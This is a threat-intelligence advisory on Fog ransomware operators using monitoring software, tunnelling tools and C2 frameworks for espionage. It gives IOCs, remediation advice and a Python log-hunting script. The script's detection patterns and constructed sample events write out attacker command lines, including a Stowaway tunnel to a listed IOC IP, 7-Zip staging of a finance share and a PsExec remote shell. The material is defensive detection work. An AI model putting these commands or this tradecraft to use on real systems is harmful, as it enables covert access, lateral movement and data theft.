Severity
High
Analysis Summary
Fog ransomware illustrates a growing pattern in which attackers turn legitimate IT tools to malicious ends. In this intrusion the operators deployed Syteca (formerly Ekran System), a commercial employee monitoring product, to covertly record screens and keystrokes on victim machines. Such software is normally installed by an organization to watch its own staff; here it gave the attackers a ready-made capability to spy on employees and harvest sensitive information, and its use points to an objective beyond financial gain, most likely espionage.
According to the researchers, the attackers also leveraged open-source penetration-testing tools: GC2, Stowaway, and Adaptix. These are normally used by security professionals but were repurposed to establish covert command-and-control channels, move files, and maintain access. GC2 blends its command-and-control traffic into legitimate services such as Google Sheets, which makes it hard to separate from ordinary SaaS use, while Stowaway, a multi-hop proxy, was used to install Syteca silently. Standard reconnaissance commands such as whoami and ipconfig were also executed, a pattern more typical of advanced persistent threat (APT) groups than of commodity ransomware affiliates.
In a notable deviation from typical ransomware behavior, the attackers established persistent backdoors even after encrypting data, a stage at which most ransomware operators have already left. Files were staged and exfiltrated with FreeFileSync, MegaSync, and 7-Zip, and lateral movement relied on PsExec and SMBExec. A watchdog process kept their tooling running, so the access survived even if an individual component was terminated. Taken together, this suggests the ransomware may have been a smokescreen and that the true objective was long-term espionage and data theft.
Impact
- Sensitive Information Theft
- File Encryption
- Unauthorized Access
- Financial Loss
Indicators of Compromise
Domain Name
amanda.protoflint.com
IP
66.112.216.232
97.64.81.119
Remediation
- Block all known indicators of compromise across security controls.
- Search for the indicators of compromise (IOCs) listed above in your environment using your respective security controls.
- Implement strong endpoint protection that detects behavior-based threats, not just known malware; the tools abused here (Syteca, GC2, Stowaway, Adaptix, PsExec) are not malicious in themselves and may not be flagged by signatures alone.
- Use network segmentation to limit lateral movement by attackers.
- Regularly audit installed software and services for suspicious or unknown tools, including monitoring agents, file-sync clients, and tunnelling utilities that IT did not deploy.
- Enable logging and centralized monitoring to track command executions, process launches, and file transfers.
- Use multi-factor authentication (MFA) for sensitive systems to reduce the risk of unauthorized access.
- Keep all systems and software updated to patch known vulnerabilities.
- Regularly back up critical data, keep copies isolated from the production network, and test your recovery process in case of ransomware attacks.
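To make the analysis above and the logging and IOC-search advice concrete, here is an added example (not code from the advisory or from any vendor) that hunts over constructed Sysmon-style log lines for the tradecraft described: the abused legitimate and offensive tools named in the analysis, the whoami/ipconfig reconnaissance burst, the listed IOCs wherever they appear (destination IP, DNS query, or a C2 address on a command line), and a repeated-relaunch heuristic for the watchdog behavior. The flattened event format, the tool-name regexes, the time windows and thresholds, and the sample events are all assumptions chosen for illustration.

```python
"""Hunt Sysmon-style logs for the Fog tradecraft described above.

Added example, not code from the advisory or any vendor. The flattened event format
("<ts> EventID=<n> Key=value Key=\"quoted value\""), the tool regexes, the
windows/thresholds and SAMPLE_LOG are all assumptions made for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

IOC_DOMAINS = {"amanda.protoflint.com"}          # from the advisory above
IOC_IPS = {"66.112.216.232", "97.64.81.119"}     # from the advisory above

# Legitimate / dual-use tools the analysis says were abused (assumed name heuristics).
TOOL_PATTERNS = [
    ("Syteca/Ekran monitoring agent", re.compile(r"syteca|ekran", re.I)),
    ("GC2 (Google Sheets C2)", re.compile(r"\bgc2\b", re.I)),
    ("Stowaway proxy", re.compile(r"stowaway", re.I)),
    ("Adaptix C2", re.compile(r"adaptix", re.I)),
    ("FreeFileSync (exfiltration)", re.compile(r"freefilesync", re.I)),
    ("MegaSync (exfiltration)", re.compile(r"megasync", re.I)),
    ("7-Zip (staging)", re.compile(r"\b7z[ag]?\.exe\b", re.I)),
    ("PsExec (lateral movement)", re.compile(r"psexe(?:c|svc)", re.I)),
    ("SMBExec (lateral movement)", re.compile(r"smbexec", re.I)),
]
RECON_BASENAMES = {"whoami.exe", "ipconfig.exe"}   # recon commands named in the analysis
FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')


def parse_event(line):
    """Parse one flattened event into a dict; 'ts' becomes a datetime."""
    ts, _, rest = line.strip().partition(" ")
    ev = {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")}
    for key, raw, quoted in FIELD_RE.findall(rest):
        ev[key] = quoted if raw.startswith('"') else raw
    return ev


def hunt(lines, recon_window=timedelta(minutes=10),
         respawn_window=timedelta(minutes=30), respawn_threshold=3):
    """Return findings as {'ts', 'host', 'kind', 'detail'} dicts, in log order."""
    findings, recon, starts, alerted = [], defaultdict(list), defaultdict(list), set()

    def add(ev, kind, detail):
        findings.append({"ts": ev["ts"], "host": ev.get("Host", "?"), "kind": kind, "detail": detail})

    for line in lines:
        ev = parse_event(line)
        host = ev.get("Host", "?")
        # 1. A listed IOC in any field: destination IP, DNS query, or a C2 address on a command line.
        values = [v for k, v in ev.items() if k != "ts"]
        for ioc in sorted(IOC_IPS | IOC_DOMAINS):
            if any(ioc in v for v in values):
                add(ev, "ioc-match", ioc)
                break
        # 2. Abused legitimate / offensive tooling, matched on image path and command line of any event.
        image, cmd = ev.get("Image", ""), ev.get("CommandLine", "")
        base = image.rsplit("\\", 1)[-1].lower()
        labels = [lbl for lbl, pat in TOOL_PATTERNS if pat.search(image + " " + cmd)]
        for lbl in labels:
            add(ev, "abused-tool", lbl)
        if ev.get("EventID") != "1":
            continue                      # the two sequence checks below need process-create events
        # 3. Watchdog heuristic: the same abused tool relaunched repeatedly on one host.
        if labels:
            starts[(host, base)].append(ev["ts"])
            recent = [t for t in starts[(host, base)] if ev["ts"] - t <= respawn_window]
            if len(recent) >= respawn_threshold and ("watchdog", host, base) not in alerted:
                alerted.add(("watchdog", host, base))
                add(ev, "possible-watchdog-respawn", f"{base} launched {len(recent)}x in {respawn_window}")
        # 4. Recon burst: both recon commands run on one host inside the window.
        if base in RECON_BASENAMES:
            recon[host].append((ev["ts"], base))
            distinct = {b for t, b in recon[host] if ev["ts"] - t <= recon_window}
            if len(distinct) >= 2 and ("recon", host) not in alerted:
                alerted.add(("recon", host))
                add(ev, "recon-burst", ", ".join(sorted(distinct)))
    return findings


# Constructed sample events (not real telemetry) that follow the intrusion narrative above.
SAMPLE_LOG = r"""
2025-06-17T10:00:05Z EventID=1 Host=WS-042 User=CORP\jdoe Image=C:\Windows\System32\cmd.exe CommandLine="cmd.exe /c dir" ParentImage=C:\Windows\explorer.exe
2025-06-17T10:02:11Z EventID=1 Host=WS-042 User=CORP\jdoe Image=C:\Windows\System32\whoami.exe CommandLine="whoami /all" ParentImage=C:\Windows\System32\cmd.exe
2025-06-17T10:02:40Z EventID=1 Host=WS-042 User=CORP\jdoe Image=C:\Windows\System32\ipconfig.exe CommandLine="ipconfig /all" ParentImage=C:\Windows\System32\cmd.exe
2025-06-17T10:05:02Z EventID=22 Host=WS-042 Image=C:\Users\Public\gc2.exe QueryName=sheets.googleapis.com
2025-06-17T10:06:30Z EventID=1 Host=WS-042 User=CORP\jdoe Image=C:\Users\Public\stowaway.exe CommandLine="stowaway.exe -c 97.64.81.119:443 --reconnect 5" ParentImage=C:\Windows\System32\cmd.exe
2025-06-17T10:07:15Z EventID=3 Host=WS-042 Image=C:\Users\Public\stowaway.exe DestinationIp=97.64.81.119 DestinationPort=443
2025-06-17T10:09:00Z EventID=1 Host=WS-042 User="NT AUTHORITY\SYSTEM" Image=C:\Windows\Temp\SytecaAgent\setup.exe CommandLine="setup.exe /S" ParentImage=C:\Users\Public\stowaway.exe
2025-06-17T10:20:00Z EventID=22 Host=SRV-FS01 Image=C:\ProgramData\adaptix\agent.exe QueryName=amanda.protoflint.com
2025-06-17T10:30:10Z EventID=1 Host=SRV-FS01 User=CORP\svc_backup Image="C:\Program Files\7-Zip\7z.exe" CommandLine="7z.exe a -p -mhe=on C:\Users\Public\fin.7z \\SRV-FS01\Finance" ParentImage=C:\Windows\System32\cmd.exe
2025-06-17T10:35:00Z EventID=1 Host=SRV-FS01 User=CORP\svc_backup Image=C:\Users\Public\PsExec64.exe CommandLine="PsExec64.exe \\SRV-DB01 -s cmd.exe" ParentImage=C:\Windows\System32\cmd.exe
2025-06-17T11:00:00Z EventID=1 Host=WS-042 User="NT AUTHORITY\SYSTEM" Image=C:\Users\Public\stowaway.exe CommandLine="stowaway.exe -c 97.64.81.119:443" ParentImage=C:\Users\Public\wd.exe
2025-06-17T11:05:00Z EventID=1 Host=WS-042 User="NT AUTHORITY\SYSTEM" Image=C:\Users\Public\stowaway.exe CommandLine="stowaway.exe -c 97.64.81.119:443" ParentImage=C:\Users\Public\wd.exe
2025-06-17T11:10:00Z EventID=1 Host=WS-042 User="NT AUTHORITY\SYSTEM" Image=C:\Users\Public\stowaway.exe CommandLine="stowaway.exe -c 97.64.81.119:443" ParentImage=C:\Users\Public\wd.exe
"""

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG.strip().splitlines()):
        print(f"{f['ts']:%H:%M:%S} {f['host']:<8} {f['kind']:<26} {f['detail']}")
```

Run as-is to print the findings for the sample; in practice feed it exported process-creation, network and DNS events from your own telemetry. The tool matches are deliberately broad (a legitimate Syteca or 7-Zip install on one host will fire too), so treat them as leads to triage together with the sequence-based findings: the recon burst and the repeated relaunch of the same binary under a parent that is not a normal launcher are the signals that distinguish this tradecraft from routine administration. The 10-minute recon window and three-launches-in-30-minutes threshold are starting points to tune.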